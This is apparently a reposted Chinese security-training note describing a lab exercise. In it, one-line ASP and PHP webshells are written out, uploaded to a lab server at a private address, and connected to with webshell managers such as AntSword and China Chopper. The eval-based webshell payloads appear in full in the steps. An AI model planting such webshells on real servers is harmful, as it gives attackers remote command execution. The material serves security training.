NSATP-A学习笔记之Day2-1webshell介绍
Posted 火星上烤鱼
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NSATP-A学习笔记之Day2-1webshell介绍相关的知识,希望对你有一定的参考价值。
Webshell和Webshell管理工具-基础实验
实验目的
- 用菜刀、蚁剑、冰蝎等工具连接ASP、php、JSP的webshell
实验环境
- 目标机:Windows Server 2012R2 IIS+Wamp(Phpstudy)+Tomcat
- 目标机ip:172.16.12.2
实验步骤
ASP大马环境
1、访问IP:172.16.12.2,可以看到如图界面
2、构造ASP一句话马:<% eval request("qwe") %>
,key为qwe,并保存文件名为shell.asp
3、上传ASP一句话马文件(这里会将上传文件自动改名为webshell.asp)
4、打开Wbeshell管理工具(这里选择蚁剑),右键添加数据
5、URL地址为http://172.16.12.2/webshell.asp添加成功并测试连接,连接成功
JSP大马环境
1、访问IP:172.16.12.2,可以看到如图界面
2、JSP大马环境已经提前上传大马文件到服务器,点击访问输入密码123即可
PHP环境上传Webshell
1、访问IP:172.16.12.2,可以看到如图界面
2、构造PHP一句话马:<?php @eval($_POST['cmd']);?>,key为cmd,并保存文件名为shell.php
3、上传PHP一句话马文件(此处默认将文件保存在images目录下)
4、打开Wbeshell管理工具(这里选择菜刀),右键添加数据
5、URL地址为http://172.16.12.2/images/shell.php,连接成功
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!
以上是关于NSATP-A学习笔记之Day2-1webshell介绍的主要内容,如果未能解决你的问题,请参考以下文章